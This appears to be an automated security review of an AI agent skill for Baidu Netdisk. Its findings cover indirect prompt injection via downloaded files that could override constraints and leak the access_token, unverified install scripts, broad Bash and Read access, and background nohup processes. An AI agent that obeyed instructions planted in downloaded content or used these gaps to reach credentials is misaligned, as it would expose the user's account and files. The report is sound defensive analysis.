百度网盘存储 Skill

DeBERTa classifier detected prompt injection (confidence: 0.91)

The skill downloads files from Baidu Netdisk and processes shared links from external sources. Malicious files or shared content could contain embedded instructions (indirect prompt injection) that the agent reads and acts upon, potentially overriding the security constraints defined in this skill, exfiltrating credentials, or performing unauthorized operations.

bdpan download <远端路径> <本地路径> ... bdpan download "https://pan.baidu.com/s/1xxxxx?pwd=abcd" ./downloaded/

The skill downloads and executes `install.sh` (and likely `update.sh`) from a Baidu CDN without performing any integrity checks (e.g., SHA256 hash verification). This makes the skill vulnerable to supply chain attacks if the CDN or the script hosted on it is compromised, leading to arbitrary code execution on the agent's host.

安装器从百度 CDN（`issuecdn.baidupcs.com`）下载并执行。注意：install.sh 不执行本地 SHA256 校验，完整性依赖 HTTPS 传输保护。

The skill extensively uses `Bash` to execute `bdpan` commands, often incorporating user-provided paths and arguments. Although the skill states '路径安全' (path safety) and prohibits path traversal, the content does not detail the sanitization mechanisms. Without robust input sanitization, a malicious user could inject arbitrary commands.

`allowed-tools: Bash`, `bdpan upload <本地路径> <远端路径>`, `bdpan download <远端路径> <本地路径>`

The `Read` tool is explicitly allowed, granting the agent the capability to read arbitrary files. While the skill defines path safety for `bdpan` operations, it does not specify how the `Read` tool will be used or if its file access is similarly restricted, posing a risk for unauthorized data access or exfiltration if user input can control the file path.

`allowed-tools: Bash, Read, Glob, Grep, AskUserQuestion`

During the large file download process, the agent uses `ls -l <本地路径>` to check the downloaded file size. If the `<本地路径>` argument is not sufficiently validated and can be influenced by a malicious user, this could be exploited to enumerate arbitrary files or directories on the local filesystem outside the intended scope.

`ls -l <本地路径> 2>/dev/null;` within the '轮询检查进度' section.

The skill employs `nohup` for background downloads, which can make process monitoring and termination more complex for the agent. While necessary for long-running tasks, it introduces a slight risk of orphaned processes or resource consumption if not managed carefully, though the skill does include polling and cleanup.

`nohup bdpan download ... & echo $!`

The skill instructs the agent to spawn background processes using nohup and write output to /tmp with a predictable naming pattern (/tmp/bdpan-dl-$$.log). This creates persistent background processes outside the agent's control, and the /tmp log path with PID-based naming could be subject to symlink attacks or log injection if an attacker can predict or influence the PID.

nohup bdpan download <远端路径> <本地路径> > /tmp/bdpan-dl-$$.log 2>&1 & echo $!

The skill prohibits reading ~/.config/bdpan/config.json which contains access_token credentials. However, the skill also grants broad Bash tool access. A crafted user instruction or indirect prompt injection through file content (e.g., a downloaded file containing instructions) could attempt to override this constraint and exfiltrate the token, as the constraint is only enforced by the skill's text instructions rather than a technical sandbox.

禁止读取或输出 `~/.config/bdpan/config.json` 内容（含 access_token 等敏感凭据）